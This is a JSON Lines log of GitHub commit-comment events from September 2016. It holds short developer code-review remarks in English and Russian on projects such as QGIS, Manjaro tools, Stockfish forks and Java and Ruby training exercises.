{"id":"4511837268","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"susuwatary/java_test"},"payload":{"comment":{"id":18889311,"position":11,"line":12,"path":"sandbox/src/main/java/rus/stqa/qatest/sandbox/Point.java","commit_id":"f0fc071cff2b0859e780cf49f2418691d24efe17","created_at":"2016-09-03T08:29:38Z","updated_at":"2016-09-03T08:29:38Z","body":"Класс Point должен описывать 1 точку.\r\nЕго конструктор должен быть таким public Point(double x, double y)"}},"created_at":"2016-09-03T08:29:38Z"}
{"id":"4511837292","type":"CommitCommentEvent","actor":{"login":"Yulife"},"repo":{"name":"PenguinSquad/Harvest-Festival"},"payload":{"comment":{"id":18889312,"position":null,"line":null,"path":null,"commit_id":"407eed9083fe0c166af559e27b4215dbd6eebf7e","created_at":"2016-09-03T08:29:39Z","updated_at":"2016-09-03T08:29:39Z","body":"joshie what do you think about making meals like realistic recipes..? :/ Like, ones that makes sense"}},"created_at":"2016-09-03T08:29:39Z"}
{"id":"4511837321","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"INWT/dbtools"},"payload":{"comment":{"id":18889313,"position":null,"line":null,"path":null,"commit_id":"7ffae62a0fc764c00bda04faf163d270465611fc","created_at":"2016-09-03T08:29:41Z","updated_at":"2016-09-03T08:29:41Z","body":"[R/helperClass.R:4:2:](https://github.com/INWT/dbtools/blob/7ffae62a0fc764c00bda04faf163d270465611fc/R/helperClass.R#L4) *style:* **Commented code should be removed.**\n```r\n​##' SingleQuery and SingleQueryList interactively. \\code{query} is the generic\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/helperClass.R:10:2:](https://github.com/INWT/dbtools/blob/7ffae62a0fc764c00bda04faf163d270465611fc/R/helperClass.R#L10) *style:* **Commented code should be removed.**\n```r\n​##' \\code{SingleQuery} inherits from \\code{character} and represents a single\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/helperClass.R:13:2:](https://github.com/INWT/dbtools/blob/7ffae62a0fc764c00bda04faf163d270465611fc/R/helperClass.R#L13) *style:* **Commented code should be removed.**\n```r\n​##' \\code{SingleQueryList} inherits from \\code{list} and represents a list of\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-helperClass.R:20:4:](https://github.com/INWT/dbtools/blob/7ffae62a0fc764c00bda04faf163d270465611fc/tests/testthat/test-helperClass.R#L20) *style:* **Commented code should be removed.**\n```r\n​  ## From template -- everything is a template\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-03T08:29:41Z"}
{"id":"4511838521","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"susuwatary/java_test"},"payload":{"comment":{"id":18889314,"position":19,"line":20,"path":"sandbox/src/main/java/rus/stqa/qatest/sandbox/Point.java","commit_id":"f0fc071cff2b0859e780cf49f2418691d24efe17","created_at":"2016-09-03T08:30:43Z","updated_at":"2016-09-03T08:30:43Z","body":"Назвать метод distance, у метода должен быть параметр вторая точка\r\npublic double distance(Point p2) "}},"created_at":"2016-09-03T08:30:43Z"}
{"id":"4511838944","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18889315,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-03T08:31:10Z","updated_at":"2016-09-03T08:31:10Z","body":"@nyalldawson I'm confused about these lines in createCandidatesAlongLineNearStraightSegment\r\n\r\n        // meaning of above/below may be reversed if using line position dependent orientation\r\n        // and the line has right-to-left direction\r\n        bool reversed = (( flags & FLAG_MAP_ORIENTATION ) ? isRightToLeft : false );\r\n\r\nShould the comment not read 'using map orientation'"}},"created_at":"2016-09-03T08:31:10Z"}
{"id":"4511840421","type":"CommitCommentEvent","actor":{"login":"victorsosa"},"repo":{"name":"mtkopone/google-analytics-plugin"},"payload":{"comment":{"id":18889318,"position":null,"line":null,"path":null,"commit_id":"e349dd5a99b80903358bc7917377fab1fa1b0ee7","created_at":"2016-09-03T08:32:35Z","updated_at":"2016-09-03T08:32:35Z","body":"Hi \r\nwould you like to contribute this change to the project?"}},"created_at":"2016-09-03T08:32:35Z"}
{"id":"4511841135","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"susuwatary/java_test"},"payload":{"comment":{"id":18889320,"position":9,"line":10,"path":"sandbox/src/main/java/rus/stqa/qatest/sandbox/Point.java","commit_id":"f0fc071cff2b0859e780cf49f2418691d24efe17","created_at":"2016-09-03T08:33:13Z","updated_at":"2016-09-03T08:33:13Z","body":"Правильно было\r\n public double x;\r\n public double y;"}},"created_at":"2016-09-03T08:33:13Z"}
{"id":"4511841159","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18889321,"position":null,"line":null,"path":null,"commit_id":"02a62a391432c9d3ecbce83d091c456a3d5b899b","created_at":"2016-09-03T08:33:14Z","updated_at":"2016-09-03T08:33:14Z","body":"This makes sense for **netinstallation**, however we [still need some](https://bugs.manjaro.org/index.php?do=details&task_id=30) for classic created ISOs"}},"created_at":"2016-09-03T08:33:14Z"}
{"id":"4511841768","type":"CommitCommentEvent","actor":{"login":"swathi-ssunder"},"repo":{"name":"PokemonGoers/PokeData"},"payload":{"comment":{"id":18889324,"position":null,"line":null,"path":null,"commit_id":"0f002e771ff80c8f1e06472697150539ed9a431c","created_at":"2016-09-03T08:33:50Z","updated_at":"2016-09-03T08:33:50Z","body":"Please do not merge this commit until the database is also migrated."}},"created_at":"2016-09-03T08:33:50Z"}
{"id":"4511841964","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"susuwatary/java_test"},"payload":{"comment":{"id":18889325,"position":40,"line":42,"path":"sandbox/src/main/java/rus/stqa/qatest/sandbox/myFirstProgram.java","commit_id":"f0fc071cff2b0859e780cf49f2418691d24efe17","created_at":"2016-09-03T08:34:01Z","updated_at":"2016-09-03T08:34:01Z","body":"Это было правильно\r\n-    Point pp1 = new Point();\r\n -    pp1.x = 3;\r\n -    pp1.y = 434;\r\n  \r\n -    Point pp2 = new Point();\r\n -    pp2.x = 32;\r\n -    pp2.y = 45;\r\n\r\n\r\nИ этот вызов верный\r\n pp1.distance(pp2);"}},"created_at":"2016-09-03T08:34:01Z"}
{"id":"4511842715","type":"CommitCommentEvent","actor":{"login":"victorsosa"},"repo":{"name":"tsanidas/google-analytics-plugin"},"payload":{"comment":{"id":18889326,"position":null,"line":null,"path":null,"commit_id":"c53572da6a08876019224f851d62244112380887","created_at":"2016-09-03T08:34:42Z","updated_at":"2016-09-03T08:34:42Z","body":"please create a PR of this"}},"created_at":"2016-09-03T08:34:42Z"}
{"id":"4511843032","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18889327,"position":null,"line":null,"path":null,"commit_id":"34e2bea24635e15e981ef915219b1095f51bbe90","created_at":"2016-09-03T08:35:00Z","updated_at":"2016-09-03T08:35:00Z","body":"Yes - sounds like that comment is wrong"}},"created_at":"2016-09-03T08:35:00Z"}
{"id":"4511843850","type":"CommitCommentEvent","actor":{"login":"vicentxiong"},"repo":{"name":"vicentxiong/vxLauncher"},"payload":{"comment":{"id":18889328,"position":null,"line":null,"path":null,"commit_id":"7a4f5ca36e76afddf5f9f044668d7f5b58ad4bfd","created_at":"2016-09-03T08:35:46Z","updated_at":"2016-09-03T08:35:46Z","body":"."}},"created_at":"2016-09-03T08:35:46Z"}
{"id":"4511844359","type":"CommitCommentEvent","actor":{"login":"vicentxiong"},"repo":{"name":"vicentxiong/vxLauncher"},"payload":{"comment":{"id":18889330,"position":null,"line":null,"path":null,"commit_id":"7a4f5ca36e76afddf5f9f044668d7f5b58ad4bfd","created_at":"2016-09-03T08:36:13Z","updated_at":"2016-09-03T08:36:13Z","body":"first project"}},"created_at":"2016-09-03T08:36:13Z"}
{"id":"4511847657","type":"CommitCommentEvent","actor":{"login":"nabbhacker"},"repo":{"name":"OneKeyToWin/LeagueRepo"},"payload":{"comment":{"id":18889334,"position":null,"line":null,"path":null,"commit_id":"3133201b455d60351ca36456c28d1a0e0a0114e2","created_at":"2016-09-03T08:39:09Z","updated_at":"2016-09-03T08:39:09Z","body":"https://github.com/OneKeyToWin/LeagueRepo/commit/3133201b455d60351ca36456c28d1a0e0a0114e2#diff-895dc4e98272e5dfb65932312b6825edR53\r\n\r\nSame name different fate :kappa:"}},"created_at":"2016-09-03T08:39:09Z"}
{"id":"4511849017","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18889335,"position":null,"line":null,"path":null,"commit_id":"00004442774cce1e7d8ca337afd99c4e90a3fb48","created_at":"2016-09-03T08:40:21Z","updated_at":"2016-09-03T08:40:21Z","body":"Ah, I missed that. Thanks!"}},"created_at":"2016-09-03T08:40:21Z"}
{"id":"4511849437","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18889336,"position":null,"line":null,"path":null,"commit_id":"02a62a391432c9d3ecbce83d091c456a3d5b899b","created_at":"2016-09-03T08:40:47Z","updated_at":"2016-09-03T08:40:47Z","body":"I actually don't get what you mean.\r\nWe write grubcfg.conf for CAL, needs to be changed after I changed our new plymouthcfg module.\r\nSo we configure plymouth in live session, and CAL does the install, regardless if netinstall of unpackfs."}},"created_at":"2016-09-03T08:40:47Z"}
{"id":"4511849461","type":"CommitCommentEvent","actor":{"login":"Aarushsharma"},"repo":{"name":"Aarushsharma/Resume"},"payload":{"comment":{"id":18889337,"position":null,"line":null,"path":null,"commit_id":"142f695e128e76cb4387976896140a31a63f8dba","created_at":"2016-09-03T08:40:49Z","updated_at":"2016-09-03T08:40:49Z","body":"Resume In JavaScript"}},"created_at":"2016-09-03T08:40:49Z"}
{"id":"4511849565","type":"CommitCommentEvent","actor":{"login":"kostyfisik"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18889338,"position":null,"line":null,"path":null,"commit_id":"6d70ce1ba60793e392b76da6e5c04bd4a712531e","created_at":"2016-09-03T08:40:57Z","updated_at":"2016-09-03T08:40:57Z","body":"It can be a good idea to switch if off  before release and to switch it on in between. There are two more files with examples that need tagging. Tatoeba file has a lot of examples of missing ё,  while wiki-reslults are mostly filled with names...I will add them to  the tagging issue not to foreget..."}},"created_at":"2016-09-03T08:40:57Z"}
{"id":"4511850273","type":"CommitCommentEvent","actor":{"login":"desalesouche"},"repo":{"name":"CarlosArriagaCM/android_kernel_huawei_msm8916"},"payload":{"comment":{"id":18889339,"position":null,"line":null,"path":null,"commit_id":"648e35ba7e84d9ab3d159799b648b0c8fe460852","created_at":"2016-09-03T08:41:30Z","updated_at":"2016-09-03T08:41:30Z","body":"https://github.com/CyanogenMod/android_kernel_huawei_msm8916/commits/cm-13.0?page=2\r\ncommit from:  input: sensors: port kx023 accelerometer driver from 4x lp kernel \r\nto input: sensors: kx023: send boot time alone with sensor events\r\nexcepted factory module and proc interface commits, is the way to fix rotation.\r\n but you will have to use sensor folder from cherry : https://github.com/CyanogenMod/android_device_huawei_msm8916-common/tree/cm-13.0/sensors may be some change will be needed in kernel/huawei/msm8916/arch/arm/boot/dts/qcom/ Y635/Y550 files related to sensors kionix and lisdh."}},"created_at":"2016-09-03T08:41:30Z"}
{"id":"4511851284","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"budimanjojo/packages-community"},"payload":{"comment":{"id":18889343,"position":null,"line":null,"path":null,"commit_id":"bd9e7578175707b2dd6df75569079ab05dfc754f","created_at":"2016-09-03T08:42:24Z","updated_at":"2016-09-03T08:42:24Z","body":"Ah, sorry! I'll add it later. It can be found in linux46 extramodules if you need it now :-)"}},"created_at":"2016-09-03T08:42:24Z"}
{"id":"4511852421","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18889346,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-03T08:43:20Z","updated_at":"2016-09-03T08:43:20Z","body":"@atamariya nice research, that's a cool test on that page.\r\nI don't know if it's true that a higher bitrate means more CPU usage or longer transcoding time. The speed to encode to MP3 even on a slow CPU will be many times faster than playback speed at any setting. Anyway I think these kind of changes should belong in some kind of \"slow network\" user profile, which right now is like our \"wireless\" network setting."}},"created_at":"2016-09-03T08:43:20Z"}
{"id":"4511854305","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18889347,"position":null,"line":null,"path":null,"commit_id":"ab7a3b37597b791dabf52301e2fee90fa4a902f9","created_at":"2016-09-03T08:45:02Z","updated_at":"2016-09-03T08:45:02Z","body":"This seems to bring less draws, I'm optimistic!"}},"created_at":"2016-09-03T08:45:02Z"}
{"id":"4511854739","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18889348,"position":null,"line":null,"path":null,"commit_id":"02a62a391432c9d3ecbce83d091c456a3d5b899b","created_at":"2016-09-03T08:45:22Z","updated_at":"2016-09-03T08:45:22Z","body":"Well, you can't configure plymouth in live-session at all. It has to be configured for the **kernel** with **mkinitcpio**. When configured in **live-session** it is to late for it."}},"created_at":"2016-09-03T08:45:22Z"}
{"id":"4511855009","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18889349,"position":2,"line":2,"path":"app/controllers/workers/onboard_controller.rb","commit_id":"2957a31aef5f14c2b14a44a47da2e68ab3e18343","created_at":"2016-09-03T08:45:36Z","updated_at":"2016-09-03T08:45:36Z","body":"can remove this"}},"created_at":"2016-09-03T08:45:36Z"}
{"id":"4511856931","type":"CommitCommentEvent","actor":{"login":"desalesouche"},"repo":{"name":"CarlosArriagaCM/android_kernel_huawei_msm8916"},"payload":{"comment":{"id":18889350,"position":null,"line":null,"path":null,"commit_id":"648e35ba7e84d9ab3d159799b648b0c8fe460852","created_at":"2016-09-03T08:47:23Z","updated_at":"2016-09-03T08:47:23Z","body":"By the way i think the best thing to do is to manage to port y550 and y635 to https://github.com/CyanogenMod/android_kernel_huawei_msm8916 branch cm-12.1 or cm-13.0.\r\nas it is done here: https://github.com/CyanogenMod/android_kernel_huawei_msm8916/commit/35cfa14ff52efe2b13e84cec6a89ff7a581258b6\r\n i asked some donation to buy y550 or y635 to help. but nobody gave me money or send me a device... so i canno't do a lot more...\r\nIf you manage to do that you might get official cm support with cherry device tree.\r\ngood luck guys!"}},"created_at":"2016-09-03T08:47:23Z"}
{"id":"4511857424","type":"CommitCommentEvent","actor":{"login":"cgygd"},"repo":{"name":"luoye-fe/countdown"},"payload":{"comment":{"id":18889351,"position":null,"line":null,"path":null,"commit_id":"230a50620480b23ea16fd0056105c11ba7054e5a","created_at":"2016-09-03T08:47:53Z","updated_at":"2016-09-03T08:47:53Z","body":"thx"}},"created_at":"2016-09-03T08:47:53Z"}
{"id":"4511857834","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889353,"position":10,"line":5,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T08:48:12Z","updated_at":"2016-09-03T08:48:12Z","body":"Первый момент, зачем ты объявляешь эту **локальную** переменную?"}},"created_at":"2016-09-03T08:48:12Z"}
{"id":"4511857879","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18889354,"position":1,"line":1,"path":"app/helpers/workers/job_categories_helper.rb","commit_id":"2957a31aef5f14c2b14a44a47da2e68ab3e18343","created_at":"2016-09-03T08:48:15Z","updated_at":"2016-09-03T08:48:15Z","body":"what is this file going to be used for? seems to specific, could all the helpers needed for the worker module be included in just one `app/helpers/workers.rb` file?"}},"created_at":"2016-09-03T08:48:15Z"}
{"id":"4511858452","type":"CommitCommentEvent","actor":{"login":"marcheing"},"repo":{"name":"rafamanzo/pcsetup"},"payload":{"comment":{"id":18889355,"position":null,"line":null,"path":null,"commit_id":"f8aeb046a58635be0fe9ffed8b3e833f862f142e","created_at":"2016-09-03T08:48:46Z","updated_at":"2016-09-03T08:48:46Z","body":"Nope. I went out of my fucking way to specifically **not** do something like this.\r\nEven if, someday somehow I drink a disproportional amount of wine to allow me to do such a thing, I would do it the [Shougo's way](https://github.com/Shougo/shougo-s-github/tree/master/vim/rc)."}},"created_at":"2016-09-03T08:48:46Z"}
{"id":"4511858466","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18889356,"position":1,"line":1,"path":"app/helpers/workers/skills_helper.rb","commit_id":"2957a31aef5f14c2b14a44a47da2e68ab3e18343","created_at":"2016-09-03T08:48:47Z","updated_at":"2016-09-03T08:48:47Z","body":"same as above, not sure why we need such specific helper files"}},"created_at":"2016-09-03T08:48:47Z"}
{"id":"4511859070","type":"CommitCommentEvent","actor":{"login":"DmitrySavchenko9"},"repo":{"name":"vinchik/september_1"},"payload":{"comment":{"id":18889358,"position":null,"line":null,"path":null,"commit_id":"1d74d897eb84f3c38ad8a667aac60b8c335f9b32","created_at":"2016-09-03T08:49:24Z","updated_at":"2016-09-03T08:49:24Z","body":"ответ на вопрос"}},"created_at":"2016-09-03T08:49:24Z"}
{"id":"4511859227","type":"CommitCommentEvent","actor":{"login":"jcalovski"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18889360,"position":null,"line":null,"path":null,"commit_id":"ab7a3b37597b791dabf52301e2fee90fa4a902f9","created_at":"2016-09-03T08:49:32Z","updated_at":"2016-09-03T08:49:32Z","body":"Yeah I got a take 2 in mind also. Let's go!"}},"created_at":"2016-09-03T08:49:32Z"}
{"id":"4511859309","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"schwabe/opentx"},"payload":{"comment":{"id":18889361,"position":null,"line":null,"path":null,"commit_id":"e9c91cd0ff709fb88f9cdeb36224b309a39c4843","created_at":"2016-09-03T08:49:37Z","updated_at":"2016-09-03T08:49:37Z","body":"ok!"}},"created_at":"2016-09-03T08:49:37Z"}
{"id":"4511860844","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889363,"position":19,"line":11,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T08:51:00Z","updated_at":"2016-09-03T08:51:00Z","body":"Второй момент, здесь на самом деле происходит вот что: `self.trains_on_station << train`, то есть вызывается **метод** у текущего объекта. Поскольку мы и так находимся в контексте объекта класса `Station`, то нет необходимости вызывать метод `trains_on_station`, нам доступна переменная экземпляра `@trains_on_station`."}},"created_at":"2016-09-03T08:51:00Z"}
{"id":"4511861083","type":"CommitCommentEvent","actor":{"login":"Saud24850"},"repo":{"name":"brillout/awesome-react-components"},"payload":{"comment":{"id":18889364,"position":null,"line":null,"path":null,"commit_id":"af62bb175f03cacde88ee88ebc6418eadb59686d","created_at":"2016-09-03T08:51:11Z","updated_at":"2016-09-03T08:51:11Z","body":"Thanks"}},"created_at":"2016-09-03T08:51:11Z"}
{"id":"4511863642","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18889368,"position":null,"line":null,"path":null,"commit_id":"02a62a391432c9d3ecbce83d091c456a3d5b899b","created_at":"2016-09-03T08:53:39Z","updated_at":"2016-09-03T08:53:39Z","body":"https://github.com/manjaro/manjaro-tools/commit/e7e09aa1bdb026da5589b89ee5f7c0bd48963cb0\r\n\r\nWhy? mkinitcpio hook and splash param will be set regardless on what image the theme is configured."}},"created_at":"2016-09-03T08:53:39Z"}
{"id":"4511864274","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18889370,"position":null,"line":null,"path":null,"commit_id":"e67d863a0adafbb71253a7853229c23f93652822","created_at":"2016-09-03T08:54:16Z","updated_at":"2016-09-03T08:54:16Z","body":"Recommendation: try and stay calm in future. Rash decisions = problems. "}},"created_at":"2016-09-03T08:54:16Z"}
{"id":"4511864653","type":"CommitCommentEvent","actor":{"login":"barrierwings-jay"},"repo":{"name":"barrierwings-jay/django_practice"},"payload":{"comment":{"id":18889371,"position":null,"line":null,"path":null,"commit_id":"215298715ab9fdc7cbd8048c7ab248ca36dc2f86","created_at":"2016-09-03T08:54:36Z","updated_at":"2016-09-03T08:54:36Z","body":"Timezone problem is fixed by installing pytz"}},"created_at":"2016-09-03T08:54:36Z"}
{"id":"4511864683","type":"CommitCommentEvent","actor":{"login":"Saud24850"},"repo":{"name":"brillout/awesome-react-components"},"payload":{"comment":{"id":18889372,"position":2,"line":1,"path":"contributing.md","commit_id":"af62bb175f03cacde88ee88ebc6418eadb59686d","created_at":"2016-09-03T08:54:38Z","updated_at":"2016-09-03T08:54:38Z","body":"Nice"}},"created_at":"2016-09-03T08:54:38Z"}
{"id":"4511864697","type":"CommitCommentEvent","actor":{"login":"xandergroeneveld"},"repo":{"name":"digitalvillager/agdraft"},"payload":{"comment":{"id":18889373,"position":1,"line":1,"path":"app/views/workers/onboard/profile_photo.html.erb","commit_id":"de63f1aa430f728b8b668cba2832ee1aec535deb","created_at":"2016-09-03T08:54:39Z","updated_at":"2016-09-03T08:54:39Z","body":"can delete this"}},"created_at":"2016-09-03T08:54:39Z"}
{"id":"4511865179","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889374,"position":25,"line":14,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T08:55:06Z","updated_at":"2016-09-03T08:55:06Z","body":"Ты проверял этот метод? Смотри, первое что странно: мы присваиваем тип поезду, зачем же делать это при выводе поездов, да ещё внутри объекта станции?\r\n\r\nДалее, как только мы присвоим тип `passenger` поезду, нам вернётся эта строка, то есть мы будем обращаться к массиву и вместо индекса использовать строку. По идее здесь должна быть такая ошибка: `TypeError: no implicit conversion of String into Integer`. Проверь это."}},"created_at":"2016-09-03T08:55:06Z"}
{"id":"4511865517","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":18889375,"position":24,"line":24,"path":"artiq/examples/phaser/repository/sawg.py","commit_id":"05a62247d9bcc1d2890496612d110a0c08759c0b","created_at":"2016-09-03T08:55:23Z","updated_at":"2016-09-03T08:55:23Z","body":"MHz?"}},"created_at":"2016-09-03T08:55:23Z"}
{"id":"4511866032","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Meburashka/java_test"},"payload":{"comment":{"id":18889376,"position":8,"line":25,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"c19e2241c7f3da42d90ab670d93e4d7cbf54d36f","created_at":"2016-09-03T08:55:50Z","updated_at":"2016-09-03T08:55:50Z","body":"WebElement element = wd.findElement(locator)\r\nelement.clear();\r\nelement.sendKeys(text);"}},"created_at":"2016-09-03T08:55:50Z"}
{"id":"4511866862","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":18889378,"position":null,"line":null,"path":null,"commit_id":"5b713ea38572954dc6105353758c7348e466a7d0","created_at":"2016-09-03T08:56:35Z","updated_at":"2016-09-03T08:56:35Z","body":"This should go on the other branches too."}},"created_at":"2016-09-03T08:56:35Z"}
{"id":"4511866959","type":"CommitCommentEvent","actor":{"login":"miglos"},"repo":{"name":"Nummer/Destroy-Windows-10-Spying"},"payload":{"comment":{"id":18889379,"position":null,"line":null,"path":null,"commit_id":"05149f11f297e61cc6893098f759f497866a098e","created_at":"2016-09-03T08:56:40Z","updated_at":"2016-09-03T08:56:40Z","body":"cant install setbuildtime.exe it stops it doesnt work for me on windows 10 "}},"created_at":"2016-09-03T08:56:40Z"}
{"id":"4511867223","type":"CommitCommentEvent","actor":{"login":"lxpk"},"repo":{"name":"hackthefuture/hackthefuture.github.com"},"payload":{"comment":{"id":18889381,"position":null,"line":null,"path":null,"commit_id":"8827d83e9058fbbc2e7e5b636f9900fdb90d648f","created_at":"2016-09-03T08:56:52Z","updated_at":"2016-09-03T08:56:52Z","body":"Lol, I can already see the participant feedback form complaining about this unmet specification."}},"created_at":"2016-09-03T08:56:52Z"}
{"id":"4511867587","type":"CommitCommentEvent","actor":{"login":"gillesfabio"},"repo":{"name":"n1k0/git-playground"},"payload":{"comment":{"id":18889382,"position":null,"line":null,"path":null,"commit_id":"4d23a6c75046edfb0df67241c0f546a52362a1cc","created_at":"2016-09-03T08:57:10Z","updated_at":"2016-09-03T08:57:10Z","body":"Oh yeah! You're the real N1k0."}},"created_at":"2016-09-03T08:57:10Z"}
{"id":"4511867637","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Meburashka/java_test"},"payload":{"comment":{"id":18889383,"position":5,"line":17,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/NavigationHelper.java","commit_id":"54105ccabfdc2bc2fc187e2b31ffb010653f16d1","created_at":"2016-09-03T08:57:12Z","updated_at":"2016-09-03T08:57:12Z","body":"wd.findElement(By.tagName(\"h1\")).getText()\r\nможно обернуть в метод\r\ngetText(By by) и положить его в HelperBase"}},"created_at":"2016-09-03T08:57:12Z"}
{"id":"4511867731","type":"CommitCommentEvent","actor":{"login":"budimanjojo"},"repo":{"name":"budimanjojo/packages-community"},"payload":{"comment":{"id":18889384,"position":null,"line":null,"path":null,"commit_id":"bd9e7578175707b2dd6df75569079ab05dfc754f","created_at":"2016-09-03T08:57:17Z","updated_at":"2016-09-03T08:57:17Z","body":"No problem. Take your time. I was just syncing it with my repo and noticed it. :) "}},"created_at":"2016-09-03T08:57:17Z"}
{"id":"4511867949","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"crunchyNYC/Stockfish2016"},"payload":{"comment":{"id":18889385,"position":null,"line":null,"path":null,"commit_id":"d6d530757498e4657d11cf86099323b1d372ff75","created_at":"2016-09-03T08:57:30Z","updated_at":"2016-09-03T08:57:30Z","body":"@crunchyNYC For example look at this ugly patch, I hope this can help, although my understanding of chess isn't really solid https://github.com/lucabrivio/Stockfish/compare/master...span_again"}},"created_at":"2016-09-03T08:57:30Z"}
{"id":"4511868671","type":"CommitCommentEvent","actor":{"login":"n1k0"},"repo":{"name":"n1k0/git-playground"},"payload":{"comment":{"id":18889386,"position":null,"line":null,"path":null,"commit_id":"4d23a6c75046edfb0df67241c0f546a52362a1cc","created_at":"2016-09-03T08:58:11Z","updated_at":"2016-09-03T08:58:11Z","body":"Haha. I'm gonna write a bog post, setting this thing up drove me crazy."}},"created_at":"2016-09-03T08:58:11Z"}
{"id":"4511869044","type":"CommitCommentEvent","actor":{"login":"ypresto"},"repo":{"name":"ergovia-mobile/android-transcoder"},"payload":{"comment":{"id":18889387,"position":null,"line":null,"path":null,"commit_id":"615042896833aaab7fa6f0be19d582fca6291eca","created_at":"2016-09-03T08:58:31Z","updated_at":"2016-09-03T08:58:31Z","body":"@ryanwilliams83 Could you tell me detail of the issue..?"}},"created_at":"2016-09-03T08:58:31Z"}
{"id":"4511869273","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18889388,"position":51,"line":31,"path":"lesson_3/dis.rb","commit_id":"286d9dded1f069e1774e9d6c589055d81cadabcf","created_at":"2016-09-03T08:58:42Z","updated_at":"2016-09-03T08:58:42Z","body":"Здесь нужно присваивать локальную переменную `station_start` переменной экземпляра:\r\n\r\n```ruby\r\n@station_start = station_start\r\n```\r\n\r\nНо ещё лучше убрать этот аксессор и определить отдельный метод `station_start`, который будет возвращать начальную станцию на основе данных из массива `@full_route`."}},"created_at":"2016-09-03T08:58:42Z"}
{"id":"4511869818","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":18889389,"position":24,"line":24,"path":"artiq/examples/phaser/repository/sawg.py","commit_id":"05a62247d9bcc1d2890496612d110a0c08759c0b","created_at":"2016-09-03T08:59:14Z","updated_at":"2016-09-03T08:59:14Z","body":"sure"}},"created_at":"2016-09-03T08:59:14Z"}
{"id":"4511870338","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Meburashka/java_test"},"payload":{"comment":{"id":18889391,"position":12,"line":83,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/ContactHelper.java","commit_id":"d5f1dacce36144d1add67cd3e76d85e4862ae57d","created_at":"2016-09-03T08:59:47Z","updated_at":"2016-09-03T08:59:47Z","body":"public void createContract(ContractData contract)  - одного параметра достаточно"}},"created_at":"2016-09-03T08:59:47Z"}
